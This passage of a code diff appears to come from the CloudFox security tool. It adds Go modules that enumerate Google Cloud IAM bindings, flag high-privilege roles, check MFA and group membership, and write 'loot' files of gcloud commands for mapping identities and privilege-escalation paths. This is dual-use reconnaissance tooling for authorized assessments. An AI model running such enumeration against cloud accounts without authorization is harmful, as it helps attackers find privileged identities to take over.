tableFiles := m.buildTablesForProject(projectID) + + // Generate loot file for this project + var lootFiles []internal.LootFile + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil { + lootFiles = append(lootFiles, *playbook) + } + + // Add project to output if there's any data + if len(tableFiles) > 0 || len(lootFiles) > 0 { + outputData.ProjectLevelData[projectID] = HiddenAdminsOutput{Table: tableFiles, Loot: lootFiles} + } + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + } +} + +func (m *HiddenAdminsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildAllTables() + + // Generate per-project playbooks + var lootFiles []internal.LootFile + for _, projectID := range m.ProjectIDs { + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil { + // Rename to include project for flat output + playbook.Name = fmt.Sprintf("hidden-admins-commands-%s", projectID) + lootFiles = append(lootFiles, *playbook) + } + } + + output := HiddenAdminsOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + } +} + +// Helper functions (shared with attackpathService) +func extractPrincipalType(member string) string { + if strings.HasPrefix(member, "user:") { + return "user" + } else if strings.HasPrefix(member, "serviceAccount:") { + return "serviceAccount" + } else if strings.HasPrefix(member, "group:") { + return "group" + } else if strings.HasPrefix(member, "domain:") { + return "domain" + } + return "unknown" +} + +func extractPrincipalEmail(member string) string { + parts := strings.SplitN(member, ":", 2) + if len(parts) == 2 { + return parts[1] + } + return member +} diff --git a/gcp/commands/iam.go b/gcp/commands/iam.go old mode 100644 new mode 100755 index 4c8b3139..fc168948 --- a/gcp/commands/iam.go +++ b/gcp/commands/iam.go @@ -1,122 +1,1335 @@ package commands import ( + "context" "fmt" + "strings" + "sync" IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) var GCPIAMCommand = &cobra.Command{ Use: globals.GCP_IAM_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP IAM information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display IAM principals and their roles information within GCP resources: -cloudfox gcp iam`, + Aliases: []string{"roles"}, + Short: "Enumerate GCP IAM principals across organizations, folders, and projects", + Long: `Enumerate GCP IAM principals and their role bindings across the entire hierarchy. + +Features: +- Enumerates IAM bindings at organization, folder, and project levels +- Shows role assignments per principal with scope information +- Enumerates service accounts with key information +- Lists custom roles with their permissions +- Identifies groups and their role assignments +- Detects high-privilege roles and public access +- Shows conditional IAM policies with details +- Attempts to retrieve MFA status for users (requires Admin SDK) +- Generates gcloud commands for privilege escalation testing`, Run: runGCPIAMCommand, } -// Results struct for IAM command that implements the internal.OutputInterface -type GCPIAMResults struct { - Data []IAMService.PrincipalWithRoles +// High-privilege roles that should be flagged +var highPrivilegeRoles = map[string]bool{ + // Owner/Editor + "roles/owner": true, + "roles/editor": true, + // IAM Admin roles + "roles/iam.securityAdmin": true, + "roles/iam.serviceAccountAdmin": true, + "roles/iam.serviceAccountKeyAdmin": true, + "roles/iam.serviceAccountTokenCreator": true, + "roles/iam.serviceAccountUser": true, + "roles/iam.workloadIdentityUser": true, + "roles/iam.roleAdmin": true, + // Resource Manager roles + "roles/resourcemanager.projectIamAdmin": true, + "roles/resourcemanager.folderAdmin": true, + "roles/resourcemanager.folderIamAdmin": true, + "roles/resourcemanager.organizationAdmin": true, + // Compute roles + "roles/compute.admin": true, + "roles/compute.instanceAdmin": true, + "roles/compute.osAdminLogin": true, + // Storage roles + "roles/storage.admin": true, + // Functions/Run roles + "roles/cloudfunctions.admin": true, + "roles/cloudfunctions.developer": true, + "roles/run.admin": true, + "roles/run.developer": true, + // Secret Manager + "roles/secretmanager.admin": true, + // Container/Kubernetes + "roles/container.admin": true, + "roles/container.clusterAdmin": true, + // BigQuery + "roles/bigquery.admin": true, + // Deployment Manager + "roles/deploymentmanager.editor": true, + // Cloud Build + "roles/cloudbuild.builds.editor": true, + // Service Usage + "roles/serviceusage.serviceUsageAdmin": true, + // Org Policy + "roles/orgpolicy.policyAdmin": true, +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type IAMModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - using enhanced data + ScopeBindings []IAMService.ScopeBinding + ServiceAccounts []IAMService.ServiceAccountInfo + CustomRoles []IAMService.CustomRole + Groups []IAMService.GroupInfo + MFAStatus map[string]*IAMService.MFAStatus + + // Per-scope loot for inheritance-aware output + OrgLoot map[string]*internal.LootFile // orgID -> loot commands + FolderLoot map[string]*internal.LootFile // folderID -> loot commands + ProjectLoot map[string]*internal.LootFile // projectID -> loot commands + + FoxMapperCache *gcpinternal.FoxMapperCache + OrgCache *gcpinternal.OrgCache + mu sync.Mutex + + // Member to groups mapping (email -> list of group emails) + MemberToGroups map[string][]string + + // Organization info for output path + OrgIDs []string + OrgNames map[string]string +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type IAMOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o IAMOutput) TableFiles() []internal.TableFile { return o.Table } +func (o IAMOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPIAMCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_IAM_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &IAMModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ScopeBindings: []IAMService.ScopeBinding{}, + ServiceAccounts: []IAMService.ServiceAccountInfo{}, + CustomRoles: []IAMService.CustomRole{}, + Groups: []IAMService.GroupInfo{}, + MFAStatus: make(map[string]*IAMService.MFAStatus), + OrgLoot: make(map[string]*internal.LootFile), + FolderLoot: make(map[string]*internal.LootFile), + ProjectLoot: make(map[string]*internal.LootFile), + MemberToGroups: make(map[string][]string), + OrgIDs: []string{}, + OrgNames: make(map[string]string), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *IAMModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache for graph-based analysis + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_IAM_MODULE_NAME) + } + + // Get OrgCache for hierarchy lookups + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + + logger.InfoM("Enumerating IAM across organizations, folders, and projects...", globals.GCP_IAM_MODULE_NAME) + + // Use the enhanced IAM enumeration + iamService := IAMService.New() + iamData, err := iamService.CombinedIAMEnhanced(ctx, m.ProjectIDs, m.ProjectNames) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, "Failed to enumerate IAM") + return + } + + m.ScopeBindings = iamData.ScopeBindings + m.ServiceAccounts = iamData.ServiceAccounts + m.CustomRoles = iamData.CustomRoles + m.Groups = iamData.Groups + m.MFAStatus = iamData.MFAStatus + + // Try to enumerate group memberships to build reverse lookup + enrichedGroups := iamService.GetGroupMemberships(ctx, m.Groups) + m.Groups = enrichedGroups + + // Build member-to-groups reverse mapping + for _, group := range enrichedGroups { + if group.MembershipEnumerated { + for _, member := range group.Members { + if member.Email != "" { + m.MemberToGroups[member.Email] = append(m.MemberToGroups[member.Email], group.Email) + } + } + } + } + + // Generate loot + m.generateLoot() + + // Count scopes and track org IDs + orgCount, folderCount, projectCount := 0, 0, 0 + scopeSeen := make(map[string]bool) + for _, sb := range m.ScopeBindings { + key := sb.ScopeType + ":" + sb.ScopeID + if !scopeSeen[key] { + scopeSeen[key] = true + switch sb.ScopeType { + case "organization": + orgCount++ + m.OrgIDs = append(m.OrgIDs, sb.ScopeID) + m.OrgNames[sb.ScopeID] = sb.ScopeName + case "folder": + folderCount++ + case "project": + projectCount++ + } + } + } + + logger.SuccessM(fmt.Sprintf("Found %d binding(s) across %d org(s), %d folder(s), %d project(s); %d SA(s), %d custom role(s), %d group(s)", + len(m.ScopeBindings), orgCount, folderCount, projectCount, + len(m.ServiceAccounts), len(m.CustomRoles), len(m.Groups)), globals.GCP_IAM_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *IAMModule) initializeLootFiles() { + // Per-scope loot is initialized lazily in addToScopeLoot +} + +func (m *IAMModule) generateLoot() { + // Track unique service accounts we've seen per scope + sasSeen := make(map[string]bool) + + for _, sb := range m.ScopeBindings { + if sb.MemberType != "ServiceAccount" { + continue + } + + // Create a unique key combining SA email and scope + scopeKey := fmt.Sprintf("%s:%s:%s", sb.ScopeType, sb.ScopeID, sb.MemberEmail) + if sasSeen[scopeKey] { + continue + } + sasSeen[scopeKey] = true + + // Check for high privilege roles + isHighPriv := highPrivilegeRoles[sb.Role] + + var lootContent string + if isHighPriv { + lootContent = fmt.Sprintf( + "# Service Account: %s [HIGH PRIVILEGE] (%s)\n"+ + "# See serviceaccounts-commands loot for describe/keys/impersonation commands\n\n", + sb.MemberEmail, sb.Role, + ) + } else { + continue // Skip non-high-privilege SAs — covered by serviceaccounts-commands loot + } + + // Route loot to appropriate scope + m.addToScopeLoot(sb.ScopeType, sb.ScopeID, "iam-commands", lootContent) + } + + // Add custom roles (project-level) + for _, role := range m.CustomRoles { + lootContent := fmt.Sprintf( + "# Custom Role: %s (%d permissions)\n"+ + "gcloud iam roles describe %s --project=%s\n\n", + role.Title, role.PermissionCount, + extractRoleName(role.Name), role.ProjectID, + ) + m.addToScopeLoot("project", role.ProjectID, "iam-commands", lootContent) + } + + // Generate IAM enumeration commands + m.generateEnumerationLoot() +} + +// addToScopeLoot adds loot content to the appropriate scope-level loot file +func (m *IAMModule) addToScopeLoot(scopeType, scopeID, lootName, content string) { + m.mu.Lock() + defer m.mu.Unlock() + + var lootMap map[string]*internal.LootFile + switch scopeType { + case "organization": + lootMap = m.OrgLoot + case "folder": + lootMap = m.FolderLoot + case "project": + lootMap = m.ProjectLoot + default: + return + } + + key := scopeID + ":" + lootName + if lootMap[key] == nil { + lootMap[key] = &internal.LootFile{ + Name: lootName, + Contents: "# GCP IAM Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n# See also: serviceaccounts-commands for SA-specific describe/keys/impersonation commands\n\n", + } + } + lootMap[key].Contents += content +} + +func (m *IAMModule) generateEnumerationLoot() { + // Add organization-level enumeration commands + for _, orgID := range m.OrgIDs { + orgName := m.OrgNames[orgID] + var lootContent string + lootContent += fmt.Sprintf("# =============================================================================\n") + lootContent += fmt.Sprintf("# Organization: %s (%s)\n", orgName, orgID) + lootContent += fmt.Sprintf("# =============================================================================\n\n") + + lootContent += fmt.Sprintf("# List all IAM bindings for organization\n") + lootContent += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json\n\n", orgID) + + lootContent += fmt.Sprintf("# List all roles assigned at organization level\n") + lootContent += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json | jq -r '.bindings[].role' | sort -u\n\n", orgID) + + lootContent += fmt.Sprintf("# List all members with their roles at organization level\n") + lootContent += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json | jq -r '.bindings[] | \"\\(.role): \\(.members[])\"'\n\n", orgID) + + m.addToScopeLoot("organization", orgID, "iam-enumeration", lootContent) + } + + // Add project-level enumeration commands + for _, projectID := range m.ProjectIDs { + projectName := m.GetProjectName(projectID) + var lootContent string + lootContent += fmt.Sprintf("# =============================================================================\n") + lootContent += fmt.Sprintf("# Project: %s (%s)\n", projectName, projectID) + lootContent += fmt.Sprintf("# =============================================================================\n\n") + + lootContent += fmt.Sprintf("# List all IAM bindings for project\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json\n\n", projectID) + + lootContent += fmt.Sprintf("# List all roles assigned at project level\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[].role' | sort -u\n\n", projectID) + + lootContent += fmt.Sprintf("# List all members with their roles at project level\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | \"\\(.role): \\(.members[])\"'\n\n", projectID) + + lootContent += fmt.Sprintf("# Find all roles for a specific user (replace USER_EMAIL)\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"USER_EMAIL\")) | .role'\n\n", projectID) + + lootContent += fmt.Sprintf("# Find all roles for a specific service account (replace SA_EMAIL)\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"SA_EMAIL\")) | .role'\n\n", projectID) + + lootContent += fmt.Sprintf("# List all service accounts in project\n") + lootContent += fmt.Sprintf("gcloud iam service-accounts list --project=%s --format=json\n\n", projectID) + + lootContent += fmt.Sprintf("# List all custom roles in project\n") + lootContent += fmt.Sprintf("gcloud iam roles list --project=%s --format=json\n\n", projectID) + + m.addToScopeLoot("project", projectID, "iam-enumeration", lootContent) + } + + // Track unique identities for enumeration commands - add to project level + identitiesSeen := make(map[string]bool) + type identityInfo struct { + email string + memberType string + roles []string + scopes []string + } + identities := make(map[string]*identityInfo) + + // Collect all unique identities and their roles/scopes + for _, sb := range m.ScopeBindings { + if sb.MemberEmail == "" { + continue + } + key := sb.MemberEmail + if !identitiesSeen[key] { + identitiesSeen[key] = true + identities[key] = &identityInfo{ + email: sb.MemberEmail, + memberType: sb.MemberType, + roles: []string{}, + scopes: []string{}, + } + } + identities[key].roles = append(identities[key].roles, sb.Role) + scopeKey := fmt.Sprintf("%s:%s", sb.ScopeType, sb.ScopeID) + // Check if scope already exists + found := false + for _, s := range identities[key].scopes { + if s == scopeKey { + found = true + break + } + } + if !found { + identities[key].scopes = append(identities[key].scopes, scopeKey) + } + } + + // Add identity-specific enumeration commands per project + for _, projectID := range m.ProjectIDs { + var lootContent string + lootContent += fmt.Sprintf("# =============================================================================\n") + lootContent += fmt.Sprintf("# Identity-Specific Enumeration Commands\n") + lootContent += fmt.Sprintf("# =============================================================================\n\n") + + for email, info := range identities { + if info.memberType == "ServiceAccount" { + lootContent += fmt.Sprintf("# Service Account: %s\n", email) + lootContent += fmt.Sprintf("# Find all roles for this service account\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"%s\")) | .role'\n\n", projectID, email) + } else if info.memberType == "User" { + lootContent += fmt.Sprintf("# User: %s\n", email) + lootContent += fmt.Sprintf("# Find all roles for this user\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"%s\")) | .role'\n\n", projectID, email) + } else if info.memberType == "Group" { + lootContent += fmt.Sprintf("# Group: %s\n", email) + lootContent += fmt.Sprintf("# Find all roles for this group\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"%s\")) | .role'\n\n", projectID, email) + } + } + + m.addToScopeLoot("project", projectID, "iam-enumeration", lootContent) + } +} + +// extractRoleName extracts the role name from full path +func extractRoleName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName } -// TableFiles formats the data for table output, CSV & JSON files -func (g GCPIAMResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// FederatedIdentityInfo contains parsed information about a federated identity +type FederatedIdentityInfo struct { + IsFederated bool + ProviderType string // AWS, GitHub, GitLab, OIDC, SAML, Azure, etc. + PoolName string + Subject string + Attribute string +} + +// parseFederatedIdentity detects and parses federated identity principals +// Federated identities use principal:// or principalSet:// format +func parseFederatedIdentity(identity string) FederatedIdentityInfo { + info := FederatedIdentityInfo{} + + // Check for principal:// or principalSet:// format + if !strings.HasPrefix(identity, "principal://") && !strings.HasPrefix(identity, "principalSet://") { + return info + } + + info.IsFederated = true + + // Parse the principal URL + // Format: principal://iam.googleapis.com/projects/{project}/locations/global/workloadIdentityPools/{pool}/subject/{subject} + // Or: principalSet://iam.googleapis.com/projects/{project}/locations/global/workloadIdentityPools/{pool}/attribute.{attr}/{value} + + // Extract pool name if present + if strings.Contains(identity, "workloadIdentityPools/") { + parts := strings.Split(identity, "workloadIdentityPools/") + if len(parts) > 1 { + poolParts := strings.Split(parts[1], "/") + if len(poolParts) > 0 { + info.PoolName = poolParts[0] + } + } + } + + // Detect provider type based on common patterns in pool names and attributes + identityLower := strings.ToLower(identity) + + switch { + case strings.Contains(identityLower, "aws") || strings.Contains(identityLower, "amazon"): + info.ProviderType = "AWS" + case strings.Contains(identityLower, "github"): + info.ProviderType = "GitHub" + case strings.Contains(identityLower, "gitlab"): + info.ProviderType = "GitLab" + case strings.Contains(identityLower, "azure") || strings.Contains(identityLower, "microsoft"): + info.ProviderType = "Azure" + case strings.Contains(identityLower, "okta"): + info.ProviderType = "Okta" + case strings.Contains(identityLower, "bitbucket"): + info.ProviderType = "Bitbucket" + case strings.Contains(identityLower, "circleci"): + info.ProviderType = "CircleCI" + case strings.Contains(identity, "attribute."): + // Has OIDC attributes but unknown provider + info.ProviderType = "OIDC" + case strings.Contains(identity, "/subject/"): + // Has subject but unknown provider type + info.ProviderType = "Federated" + default: + info.ProviderType = "Federated" + } + + // Extract subject if present + if strings.Contains(identity, "/subject/") { + parts := strings.Split(identity, "/subject/") + if len(parts) > 1 { + info.Subject = parts[1] + } + } + + // Extract attribute and value if present + // Format: .../attribute.{attr}/{value} + if strings.Contains(identity, "/attribute.") { + parts := strings.Split(identity, "/attribute.") + if len(parts) > 1 { + attrParts := strings.Split(parts[1], "/") + if len(attrParts) >= 1 { + info.Attribute = attrParts[0] + } + if len(attrParts) >= 2 { + // The value is the specific identity (e.g., repo name) + info.Subject = attrParts[1] + } + } + } + + return info +} +// formatFederatedInfo formats federated identity info for display +func formatFederatedInfo(info FederatedIdentityInfo) string { + if !info.IsFederated { + return "-" + } + + result := info.ProviderType + + // Show subject (specific identity like repo/workflow) if available + if info.Subject != "" { + result += ": " + info.Subject + } else if info.Attribute != "" { + result += " [" + info.Attribute + "]" + } + + // Add pool name in parentheses + if info.PoolName != "" { + result += " (pool: " + info.PoolName + ")" + } + + return result +} + +// formatCondition formats a condition for display +func formatCondition(condInfo *IAMService.IAMCondition) string { + if condInfo == nil { + return "No" + } + + // Build a meaningful condition summary + parts := []string{} + + if condInfo.Title != "" { + parts = append(parts, condInfo.Title) + } + + // Parse common condition patterns from expression + expr := condInfo.Expression + if expr != "" { + // Check for time-based conditions + if strings.Contains(expr, "request.time") { + if strings.Contains(expr, "timestamp") { + parts = append(parts, "[time-limited]") + } + } + // Check for resource-based conditions + if strings.Contains(expr, "resource.name") { + parts = append(parts, "[resource-scoped]") + } + // Check for IP-based conditions + if strings.Contains(expr, "origin.ip") || strings.Contains(expr, "request.origin") { + parts = append(parts, "[IP-restricted]") + } + // Check for device policy + if strings.Contains(expr, "device") { + parts = append(parts, "[device-policy]") + } + } + + if len(parts) == 0 { + return "Yes" + } + + return strings.Join(parts, " ") +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *IAMModule) buildTables() []internal.TableFile { + // New table structure with Scope Type/ID/Name header := []string{ - "Name", - "Principal Type", + "Scope Type", + "Scope ID", + "Scope Name", + "Entry Type", + "Identity", "Role", - "PolicyResourceType", - "PolicyResourceID", + "Admin", + "Custom Role", + "Has Keys", + "Condition", + "MFA", + "Groups", + "Federated", + "SA Attack Paths", } var body [][]string - for _, principal := range g.Data { - for _, binding := range principal.PolicyBindings { - body = append(body, []string{ - principal.Name, - principal.Type, - binding.Role, - principal.ResourceType, - principal.ResourceID, - }) + // Add scope bindings (one row per binding) + for _, sb := range m.ScopeBindings { + // Check admin status from FoxMapper only - shows Org/Folder/Project or No + // This is different from "high privilege roles" - Admin means broad IAM control + adminStatus := gcpinternal.GetAdminStatusFromCache(m.FoxMapperCache, sb.MemberEmail) + if adminStatus == "" { + adminStatus = "No" + } + + isCustom := "No" + if sb.IsCustom { + isCustom = "Yes" + } + + // Format condition + condition := "No" + if sb.HasCondition { + condition = formatCondition(sb.ConditionInfo) + } + + // Get MFA status + mfa := "-" + if sb.MemberType == "User" { + if status, ok := m.MFAStatus[sb.MemberEmail]; ok { + if status.Error != "" { + mfa = "Unknown" + } else if status.HasMFA { + mfa = "Yes" + } else { + mfa = "No" + } + } + } else if sb.MemberType == "ServiceAccount" { + mfa = "N/A" + } + + // Get groups this member belongs to + groups := "-" + if memberGroups, ok := m.MemberToGroups[sb.MemberEmail]; ok && len(memberGroups) > 0 { + groups = strings.Join(memberGroups, ", ") + } + + // Check for federated identity + federated := formatFederatedInfo(parseFederatedIdentity(sb.MemberEmail)) + + // Check attack paths for service account principals + attackPaths := "-" + if sb.MemberType == "ServiceAccount" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sb.MemberEmail) + } + + body = append(body, []string{ + sb.ScopeType, + sb.ScopeID, + sb.ScopeName, + sb.MemberType, + sb.MemberEmail, + sb.Role, + adminStatus, + isCustom, + "-", + condition, + mfa, + groups, + federated, + attackPaths, + }) + } + + // Add service accounts + for _, sa := range m.ServiceAccounts { + hasKeys := "No" + if sa.HasKeys { + hasKeys = "Yes" + } + + disabled := "" + if sa.Disabled { + disabled = " (disabled)" + } + + // Get groups this SA belongs to + groups := "-" + if memberGroups, ok := m.MemberToGroups[sa.Email]; ok && len(memberGroups) > 0 { + groups = strings.Join(memberGroups, ", ") + } + + // Check admin status from FoxMapper + adminStatus := gcpinternal.GetAdminStatusFromCache(m.FoxMapperCache, sa.Email) + if adminStatus == "" { + adminStatus = "No" + } + + // Check attack paths for this service account + attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa.Email) + + body = append(body, []string{ + "project", + sa.ProjectID, + m.GetProjectName(sa.ProjectID), + "ServiceAccountInfo", + sa.Email + disabled, + sa.DisplayName, + adminStatus, + "-", + hasKeys, + "-", + "N/A", + groups, + "-", // Service accounts are not federated identities + attackPaths, + }) + } + + // Add custom roles + for _, role := range m.CustomRoles { + deleted := "" + if role.Deleted { + deleted = " (deleted)" } + + body = append(body, []string{ + "project", + role.ProjectID, + m.GetProjectName(role.ProjectID), + "CustomRole", + extractRoleName(role.Name) + deleted, + fmt.Sprintf("%s (%d permissions)", role.Title, role.PermissionCount), + "-", + "Yes", + "-", + "-", + "-", + "-", + "-", // Custom roles are not federated identities + "-", // Custom roles don't have attack paths + }) } - tableFile := internal.TableFile{ - Header: header, - Body: body, - Name: globals.GCP_IAM_MODULE_NAME, + // Build tables + tables := []internal.TableFile{ + { + Name: "iam", + Header: header, + Body: body, + }, } - tableFiles = append(tableFiles, tableFile) - return tableFiles + return tables } -// LootFiles can be implemented if needed -func (g GCPIAMResults) LootFiles() []internal.LootFile { - return []internal.LootFile{} +// collectAllLootFiles collects all loot files from all scopes for org-level output. +// This merges loot by name (iam-commands, iam-enumeration) across all scopes. +func (m *IAMModule) collectAllLootFiles() []internal.LootFile { + // Merge loot by name across all scopes + mergedLoot := make(map[string]*internal.LootFile) + + // Helper to add loot content + addLoot := func(lootMap map[string]*internal.LootFile) { + for key, loot := range lootMap { + // Key format is "scopeID:lootName" + parts := strings.SplitN(key, ":", 2) + if len(parts) != 2 { + continue + } + lootName := parts[1] + + if mergedLoot[lootName] == nil { + mergedLoot[lootName] = &internal.LootFile{ + Name: lootName, + Contents: "", + } + } + // Avoid duplicate headers + content := loot.Contents + if strings.HasPrefix(content, "# GCP IAM") { + // Skip header if already present + if mergedLoot[lootName].Contents == "" { + // First entry, keep header + } else { + // Strip header from subsequent entries + lines := strings.SplitN(content, "\n\n", 2) + if len(lines) > 1 { + content = lines[1] + } + } + } + mergedLoot[lootName].Contents += content + } + } + + // Add in order: org, folder, project + addLoot(m.OrgLoot) + addLoot(m.FolderLoot) + addLoot(m.ProjectLoot) + + var lootFiles []internal.LootFile + for _, loot := range mergedLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles } -// Houses high-level logic that retrieves IAM information and writes to output -func runGCPIAMCommand(cmd *cobra.Command, args []string) { - // Retrieve projectIDs and resource type from parent (gcp command) ctx - var projectIDs []string - var resourceType string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_IAM_MODULE_NAME) +// collectLootFilesForProject returns loot files for a specific project with inheritance. +// This includes org-level loot + ancestor folder loot + project-level loot. +func (m *IAMModule) collectLootFilesForProject(projectID string) []internal.LootFile { + // Get ancestry for this project + var projectOrgID string + var ancestorFolders []string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + } + + // Merge loot by name + mergedLoot := make(map[string]*internal.LootFile) + + // Helper to add loot content + addLoot := func(key string, loot *internal.LootFile) { + parts := strings.SplitN(key, ":", 2) + if len(parts) != 2 { + return + } + lootName := parts[1] + + if mergedLoot[lootName] == nil { + mergedLoot[lootName] = &internal.LootFile{ + Name: lootName, + Contents: "", + } + } + // Avoid duplicate headers + content := loot.Contents + if strings.HasPrefix(content, "# GCP IAM") { + if mergedLoot[lootName].Contents == "" { + // First entry, keep header + } else { + // Strip header from subsequent entries + lines := strings.SplitN(content, "\n\n", 2) + if len(lines) > 1 { + content = lines[1] + } + } + } + mergedLoot[lootName].Contents += content + } + + // Add org-level loot + if projectOrgID != "" { + for key, loot := range m.OrgLoot { + if strings.HasPrefix(key, projectOrgID+":") { + addLoot(key, loot) + } + } + } + + // Add ancestor folder loot (in order from top to bottom) + for i := len(ancestorFolders) - 1; i >= 0; i-- { + folderID := ancestorFolders[i] + for key, loot := range m.FolderLoot { + if strings.HasPrefix(key, folderID+":") { + addLoot(key, loot) + } + } + } + + // Add project-level loot + for key, loot := range m.ProjectLoot { + if strings.HasPrefix(key, projectID+":") { + addLoot(key, loot) + } + } + + var lootFiles []internal.LootFile + for _, loot := range mergedLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles +} + +func (m *IAMModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // Determine org ID - prefer discovered orgs, fall back to hierarchy + orgID := "" + if len(m.OrgIDs) > 0 { + orgID = m.OrgIDs[0] + } else if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + lootFiles := m.collectAllLootFiles() + tables := m.buildTables() + + // Check if we should use single-pass tee streaming for large datasets + totalRows := 0 + for _, t := range tables { + totalRows += len(t.Body) + } + + if orgID != "" && totalRows >= 50000 { + m.writeHierarchicalOutputTee(ctx, logger, orgID, tables, lootFiles) return } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_IAM_MODULE_NAME) + // Standard output path for smaller datasets + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - // TODO fix once folders or organizations are supported as input for project root - resourceType = "project" + if orgID != "" { + // DUAL OUTPUT: Complete aggregated output at org level + outputData.OrgLevelData[orgID] = IAMOutput{Table: tables, Loot: lootFiles} - // Initialize IAMService and fetch principals with roles for the given projectIDs and resource type - iamService := IAMService.New() - var results []IAMService.PrincipalWithRoles - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving IAM information for resource: %s of type %s", projectID, resourceType), globals.GCP_IAM_MODULE_NAME) - principals, err := iamService.PrincipalsWithRoles(projectID, resourceType) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_IAM_MODULE_NAME) - return + // DUAL OUTPUT: Filtered per-project output (with inherited loot) + for _, projectID := range m.ProjectIDs { + projectTables := m.buildTablesForProject(projectID) + projectLoot := m.collectLootFilesForProject(projectID) + if len(projectTables) > 0 